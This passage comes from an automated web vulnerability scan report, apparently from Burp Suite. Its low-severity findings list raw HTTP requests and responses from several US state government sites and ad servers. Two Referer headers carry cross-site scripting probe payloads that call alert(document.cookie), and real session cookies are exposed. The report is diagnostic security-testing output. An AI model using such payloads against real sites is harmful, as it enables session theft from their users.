User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1059
Content-Type: text/html
Content-Location: http://treas-secure.treas.state.mi.us/eservice_enu/Default.htm
Last-Modified: Thu, 03 Feb 2005 04:44:18 GMT
Accept-Ranges: bytes
ETag: "07d205ab9c51:b3e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:40:44 GMT
Connection: close

<html>

<head>
<script>
function GotoUrl(url)
{
   

// Append the current hostname to the server request so that the server has
// the top level host name. This is needed to supp
...[SNIP]...

28.48. http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /iaction/adoapn_AppNexusDemoActionTag_1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sat, 30 Apr 2011 15:08:51 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1303072666-9018543%7cMUI
...[SNIP]...

28.49. http://view.atdmt.com/iaction/kgakog_General_1/v3/ato./[atc1.1215451620/atc2.false/atc3.landing%20page:visit%20florida]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /iaction/kgakog_General_1/v3/ato./[atc1.1215451620/atc2.false/atc3.landing%20page:visit%20florida]

Request

GET /iaction/kgakog_General_1/v3/ato./[atc1.1215451620/atc2.false/atc3.landing%20page:visit%20florida] HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484; MUID=B506C07761D7465D924574124E3C14DF

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sat, 30 Apr 2011 15:08:25 GMT
Connection: close
Content-Length: 609

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&betr=odak_cs=[+]1[720]" width="1
...[SNIP]...

28.50. https://web.globalpay.com/taxpayer/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://web.globalpay.com
Path:   /taxpayer/default.asp

Request

GET /taxpayer/default.asp HTTP/1.1
Host: web.globalpay.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:29:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1095
Content-Type: text/html
Set-Cookie: CISESSIONID=a928f6218ded1a429f519b1e54f13c00ICE89; path=/
Set-Cookie: ASPSESSIONIDQAQCCRDC=DKIDEAACBINHDMEGFHEFNLAD; path=/
Cache-control: private

<HTML><HEAD><TITLE>Unisys Internet Commerce Enabler Error Message</TITLE></HEAD><BODY><table width=100% border=0><tr><td rowspan=2 bordercolor=#0033FF><img src=/CISystem/Images/Globe.gif width=147 hei
...[SNIP]...

28.51. http://www.alabama.gov/portal/common/feedback.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/common/feedback.jsp

Request

GET /portal/common/feedback.jsp HTTP/1.1
Host: www.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; alabama_gov_style=standardText; __utmz=222685003.1304164585.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=222685003.1298336245.1304123819.1304126433.1304164585.3; __utmc=222685003; __utmb=222685003.2.10.1304164585;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:32 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Connection: close
Content-Type: text/html
Content-Length: 273


<script src="javascript/encryption.js" type="text/javascript" language="javascript"></script> <!--Encryption functions-->
<script src="javascript/controlFunctions.js" type="text/javascr
...[SNIP]...

28.52. http://www.alabama.gov/sliverheader/Welcome.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /sliverheader/Welcome.do

Request

GET /sliverheader/Welcome.do HTTP/1.1
Host: www.alabama.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; alabama_gov_style=standardText; __utmz=222685003.1304164585.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/19; __utma=222685003.1298336245.1304123819.1304126433.1304164585.3; __utmc=222685003; __utmb=222685003.2.10.1304164585;

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:29:38 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Connection: close
Content-Type: text/html
Content-Length: 909


<table width="90%" border="0" align="center" cellpadding="5" cellspacing="0">

<tr>
<td align="center"> <table>
<tr>
<td class="errorTitle"><div align="cent
...[SNIP]...

28.53. https://www.alabamainteractive.org/abc_license/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /abc_license/

Request

GET /abc_license/ HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:24:51 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Cache-Control: private
Set-Cookie: JSESSIONID=abcWSekZskj886PHHaK_s; path=/
Keep-Alive: timeout=20, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 3284


<link rel='stylesheet' href='content/common/styleSheet.jsp' type='text/css'/>

<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" class="containerTable">
...[SNIP]...

28.54. https://www.alabamainteractive.org/arecmenu/welcome.action  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.alabamainteractive.org
Path:   /arecmenu/welcome.action

Request

GET /arecmenu/welcome.action HTTP/1.1
Host: www.alabamainteractive.org
Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?id=professional
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abcZcJfPy2b9VciC3-J_s

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:25:05 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 4958


<html>


<head>

<title>
Alabama Real Estate Commission Application Menu - login
</title>
<link rel='stylesheet' href='content/common/CSS/BrownAndGold.css' type='text/css'/>

<s
...[SNIP]...

28.55. http://www.ct.gov/ctportal/assets/templates/62/css/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/assets/templates/62/css/print.css

Request

GET /ctportal/assets/templates/62/css/print.css HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Connection: close
Date: Fri, 29 Apr 2011 22:49:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1416
Content-Type: text/html
Cache-control: private


<html>
<head>
   <Title>DSF</Title>
</head>
<body bgcolor=white>

       <center>
           <img src='../assets/templates/0/images/failover_header.gif'><table border="0" cellpadding="0" cellspacing="0"
...[SNIP]...

28.56. http://www.ct.gov/ctportal/cwp/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/a

Request

GET /ctportal/cwp/a HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/ctportal/cwp/view.asp?a=84329e06%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9a33d81c68f&q=431930
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ctportalNav%5FGID=; ctportalNav=; ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D84329e06%22%3E%3Cimg%2520src%253da%2520onerror%253dalert%28document%2Ecookie%29%3E9a33d81c68f%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.2.10.1304117373

Response

HTTP/1.1 404
Connection: close
Date: Fri, 29 Apr 2011 22:52:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1416
Content-Type: text/html
Cache-control: private


<html>
<head>
   <Title>DSF</Title>
</head>
<body bgcolor=white>

       <center>
           <img src='../assets/templates/0/images/failover_header.gif'><table border="0" cellpadding="0" cellspacing="0"
...[SNIP]...

28.57. http://www.ct.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 404
Connection: close
Date: Fri, 29 Apr 2011 22:49:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1416
Content-Type: text/html
Cache-control: private


<html>
<head>
   <Title>DSF</Title>
</head>
<body bgcolor=white>

       <center>
           <img src='../assets/templates/0/images/failover_header.gif'><table border="0" cellpadding="0" cellspacing="0"
...[SNIP]...

28.58. http://www.dot.state.tx.us/txdoteforms/GetForm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dot.state.tx.us
Path:   /txdoteforms/GetForm

Request

GET /txdoteforms/GetForm HTTP/1.1
Host: www.dot.state.tx.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:32:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Last-Modified: Fri, 20 Aug 2010 16:31:06 GMT
Content-Length: 2224
Content-Language: en-US
Server: WebSphere Application Server/6.1

<%@ page isErrorPage="true"%>

<html>

<head>
   <title>TxDOT Error Page</title>
   
</head>

<body>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TR>
       <TD><img border="0"
...[SNIP]...

28.59. http://www.dyve.net/jquery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dyve.net
Path:   /jquery/

Request

GET /jquery/ HTTP/1.1
Host: www.dyve.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 12:31:59 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html
Content-Length: 973

<!DOCTYPE html>
<html>
   <head>
       <title>jQuery Plugins by Dylan Verheul</title>
       <link rel="stylesheet" type="text/css" href="main.css" />
       <script type="text/javascript" src="/jquery/js/jquery.js">
...[SNIP]...

28.60. http://www.georgia.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.georgia.gov
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.georgia.gov
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=EDD752633B20E78A7AFA2DA9CD149B6D; vgnvisitor=2w45tM000-800001jrJoFmdEac; __utma=212381186.1206636533.1304125293.1304125293.1304125293.1; __utmb=212381186; __utmc=212381186; __utmz=212381186.1304125293.1.1.utmccn=(referral)|utmcsr=ga.gov|utmcct=/00/channel_title/0,2094,4802_4969,00.html|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Sat, 30 Apr 2011 00:32:39 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 2144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<!--
...[SNIP]...

28.61. http://www.hoosierdata.in.gov/nav.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hoosierdata.in.gov
Path:   /nav.asp

Request

GET /nav.asp HTTP/1.1
Host: www.hoosierdata.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:38:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRADTD=KEJNAPOBIJKGDMMBEBBIDPGE; path=/
Cache-control: private

<font face="Arial" size=2>
<p>ADODB.Field</font> <font face="Arial" size=2>error '800a0bcd'</font>
<p>
<font face="Arial" size=2>Either BOF or EOF is True, or the current record has been deleted. Req
...[SNIP]...

28.62. http://www.in.gov/sliverheader/Welcome.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.in.gov
Path:   /sliverheader/Welcome.do

Request

GET /sliverheader/Welcome.do HTTP/1.1
Host: www.in.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=58136434.1304126856.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=58136434.288860735.1304126856.1304126856.1304126856.1; __utmc=58136434; BIGipServerwww.IN.gov-http=1882523658.20480.0000; __utmb=58136434.2.10.1304126856;

Response

HTTP/1.1 200 OK
Server: Resin/3.1.9
Cache-Control: private
Set-Cookie: JSESSIONID=abchuI-VI8kk1fv31AM_s; path=/
Content-Type: text/html
Connection: close
Date: Sat, 30 Apr 2011 12:39:04 GMT
Set-Cookie: BIGipServerlb.www.app.IN.gov-sliverheader=4046653450.36895.0000; expires=Sat, 30-Apr-2011 12:40:04 GMT; path=/
Content-Length: 893


<table width="90%" border="0" align="center" cellpadding="5" cellspacing="0">

<tr>
<td align="center"> <table>
<tr>
<td class="errorTitle"><div align="cent
...[SNIP]...

28.63. http://www.labor.vermont.gov/sections/wfd/training/wiatrain/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.labor.vermont.gov
Path:   /sections/wfd/training/wiatrain/index.cfm

Request

GET /sections/wfd/training/wiatrain/index.cfm HTTP/1.1
Host: www.labor.vermont.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 29 Apr 2011 21:07:25 GMT
X-Powered-By: ASP.NET
Connection: close
Content-type: text/html
Page-Completion-Status: Normal


<HTML>
<HEAD><TITLE>DET WIA Training</TITLE>
<META HTTP-EQUIV="Pragma" Content="NoCache">
<META HTTP-EQUIV="EXPIRES" Content="0">
<META HTTP-EQUIV="Cache-Control" Content="no-cache">
<
...[SNIP]...

28.64. http://www.legis.louisiana.gov/boards/board_members.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legis.louisiana.gov
Path:   /boards/board_members.asp

Request

GET /boards/board_members.asp HTTP/1.1
Host: www.legis.louisiana.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Sat, 30 Apr 2011 12:39:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 427
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAAQBDQT=NOEHGLCAFKBPCDAEPEHNNJIJ; path=/
Cache-control: private

<html>
<head><title>Louisiana Boards and Commissions</title></head>
<body BGCOLOR="#FFFFFF">
<p><br>
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Ar
...[SNIP]...

28.65. http://www.legis.state.la.us/billdata/bytype.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legis.state.la.us
Path:   /billdata/bytype.asp

Request

GET /billdata/bytype.asp HTTP/1.1
Host: www.legis.state.la.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:39:11 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 672
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCAAQBDQT=APEHGLCABKMMOEDDGKLLFLPO; path=/
Cache-control: private


<html>

   <head><title>2005 Regular Session - Instrument Information</title></head>
   <body bgcolor="FFFFFF">
   <p><br>
<table align=center cellpadding=10 border=0>
<tr><td>
<center><h2>2005 R
...[SNIP]...

28.66. http://www.legis.state.la.us/puls_main.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legis.state.la.us
Path:   /puls_main.htm

Request

GET /puls_main.htm HTTP/1.1
Host: www.legis.state.la.us
Proxy-Connection: keep-alive
Referer: http://legis.state.la.us/contact.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 1599
Content-Type: text/html
Last-Modified: Mon, 07 Jun 2010 21:18:28 GMT
Accept-Ranges: bytes
ETag: "66daebf8866cb1:107d"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 01:02:57 GMT

<html>
<head>
<title>PULS Line Information</title>
</head>
<body>
<font face="Arial">
<center>


<table cellpadding=10 cellspacing=10>
<tr><td><font face="Arial">

<br>The <font size=+1 co
...[SNIP]...

28.67. http://www.missingkids.com/cybertip/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.missingkids.com
Path:   /cybertip/

Request

GET /cybertip/ HTTP/1.1
Host: www.missingkids.com
Proxy-Connection: keep-alive
Referer: http://nj.gov/nj/safety/internet/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html
Last-Modified: Thu, 28 Apr 2011 18:58:57 GMT
Content-Length: 261
ETag: "105-4db9b8f1"
Accept-Ranges: bytes
Date: Sat, 30 Apr 2011 00:40:54 GMT
Connection: close

<html>
<head>
<title>National Center for Missing and Exploited Children</title>
</head>
<body>
<script language="JavaScript">
location="http://www.missingkids.com/missingkids/servlet/PageServlet?La
...[SNIP]...

28.68. http://www.nccourts.org/Citizens/GoToCourt/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nccourts.org
Path:   /Citizens/GoToCourt/Default.asp

Request

GET /Citizens/GoToCourt/Default.asp?topic=1 HTTP/1.1
Host: www.nccourts.org
Proxy-Connection: keep-alive
Referer: http://nc.gov/1222,1222,Online_Services,Online_Services.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 00:49:01 GMT
X-Powered-By: ASP.NET
Content-Length: 16514
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASDQTAAR=ADICHPIBABAGCDEJAHFKEIPM; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html>
   <head>
       <meta name="GENERATOR" content="Microsoft Visual Studio 6.0" /
...[SNIP]...

28.69. http://www.nccourts.org/Forms/FormSearchResults.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nccourts.org
Path:   /Forms/FormSearchResults.asp

Request

GET /Forms/FormSearchResults.asp HTTP/1.1
Host: www.nccourts.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASDQTAAR=PCICHPIBOGMIFCHDGPEAMKKM;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 12:40:09 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 14882
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html>
   <head>
       <meta name="GENERATOR" content="Microsoft Visual Studio 6.0"
...[SNIP]...

28.70. http://www.nccourts.org/Support/FAQs/FAQs.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nccourts.org
Path:   /Support/FAQs/FAQs.asp

Request

GET /Support/FAQs/FAQs.asp HTTP/1.1
Host: www.nccourts.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASPSESSIONIDASDQTAAR=PCICHPIBOGMIFCHDGPEAMKKM;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 30 Apr 2011 12:40:11 GMT
X-Powered-By: ASP.NET
Connection: close
Content-Length: 23502
Content-Type: text/html
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">
<html>
   <head>
       <meta name="GENERATOR" content="Microsoft Visual Studio 6.0" /
...[SNIP]...

28.71. http://www.nhfishandgame.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /

Request

GET / HTTP/1.1
Host: www.nhfishandgame.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 29 Apr 2011 22:42:47 GMT
Server: OutdoorCentralServer
Last-Modified: Tue, 18 Jan 2011 21:59:53 GMT
ETag: "54c2a6-f07-52b4840"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 3847

<html>
<head>
<title>GreatLodge.com :: Outdoor Central :: Active Outdoors</title>
</head>
<script language="Javascript">
window.location="/cgi-bin/gl/outdoor.cgi"
//-->
</script>
<style type=text/
...[SNIP]...

28.72. http://www.nhfishandgame.com/cgi-bin/gl/outdoor.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nhfishandgame.com
Path:   /cgi-bin/gl/outdoor.cgi

Request

GET /cgi-bin/gl/outdoor.cgi HTTP/1.1
Host: www.nhfishandgame.com
Proxy-Connection: keep-alive
Referer: http://www.nhfishandgame.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

